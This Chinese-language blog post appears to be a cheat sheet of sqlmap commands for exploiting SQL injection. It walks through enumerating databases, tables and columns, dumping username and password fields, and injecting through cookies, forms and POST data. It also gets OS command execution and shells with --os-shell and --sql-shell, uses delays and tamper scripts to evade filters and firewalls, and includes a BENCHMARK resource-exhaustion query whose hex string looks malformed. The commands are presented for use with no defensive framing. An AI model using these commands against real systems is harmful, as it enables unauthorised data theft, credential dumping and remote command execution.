sqlmap中SQL注入方法及指令碼

2021-10-05 14:30:53 字數 2338 閱讀 6034

在這兒總結和記錄了一些sql注入的注入方法和指令碼

//url 輸入需注入的**位址

1、觀察是否能注入

sqlmap -u "url"
2、獲取表單

sqlmap -u "url"

--tables

3、掃瞄欄位column (這兒掃瞄了admin列)

sqlmap -u "url"

--columns -t admin

4、查詢資料

sqlmap -u "url"

--dump -t admin -c "username,password"

1、掃瞄資料庫

sqlmap -u "url"

--dbs

2、掃瞄指定資料庫(db)的表

sqlmap -u "url"

-d "db"

--tables

3、掃瞄db的欄位名

sqlmap -u "url"

-d "db"

-t "表名"

--columns

4、查詢敏感資料

sqlmap -u "url"

-d "db"

-t "表名"

-c id,username,password --dump

//問號需要輸入數字

sqlmap  -u "url"

--cookie "id == ?"

--columns -t admin --level 2

sqlmap  -u "url"

--cookie "id == ?"

--columns -t admin -c 「username,password" --level 2

sqlmap -u "url"

--forms

sqlmap -u "url"

--data "tfuname=1&tfupass=1"

需要較大許可權

sqlmap -u "url"

--os-cmd=ipconfig

獲取shell

sqlmap -u "url"

--os-shell

1、獲取有效資料庫

sqlmap -u "url"

*.html --dbs //存在注入的地方加上*

2、查詢表內容

sqlmap -u "url"

*.html --d "db"

--tables

3、獲取欄位名

sqlmap -u "url"

*.html --d "db"

-t "表名"

--columns

sqlmap -u "url"

*.html --delay 1

--dbs

sqlmap -u "url"

*.html --safe-freq 3

--dbs

獲取shell

sqlmap -u "url"

--sql-shell

在shell處執行

select benchmark(99999999999.0x70726f62616e646f70726f62616e646f7072662616e646f)

指令碼

sqlmap -u  "url"

-v 3

--dbs --batch --tamper "base64encode.py"

sqlmap -u  "url"

-v 3

--dbs --batch --tamper "space2hash.py"

sqlmap -u  "url"

-v 3

--dbs --batch --tamper "space2morehash.py"

sqlmap -u  "url"

-v 3

--dbs --batch --tamper "charencode.py"

介紹sqlmap中的SQL注入filter逃逸

每當我發現乙個sql注入漏洞時,我都會在注入點使用sqlmap。這是乙個操作簡單易於使用的工具,不僅能證實漏洞,而且還可以提取相關資料 獲得執行命令,以及執行進一步的實驗操作。如果碰到filter或是網路應用防火牆,我會習慣性地打破burp suite並且開始手動規避篩選,但是接下來介紹的這種方法更...

SQL注入神器 SqlMap

sqlmap是乙個開源的滲透測試工具,可以自動檢測和利用sql漏洞,並且在sectools.org注入工具中一直排名第一。sqlmap分配有乙個強大的搜尋引擎,如果url存在注入漏洞,它就可以從資料庫中直接提取資料,如果資料庫使用者許可權較大的話甚至可以直接執行作業系統的一些命令 讀取檔案。sqlm...

SQL注入之Sqlmap使用

我們都知道,對於網路滲透最重要的一步是要拿到後台資料庫管理員的密碼與使用者名稱,那麼怎麼得到這個使用者名稱和密碼呢?就要用到今天所說的sqlmap,它不僅適用於內網環境,在外網環境也是非常受歡迎的,並且在kali linux裡邊顯得尤為重要,它所到之處幾乎是 寸草不生 那麼接下來我就簡單介紹下sql...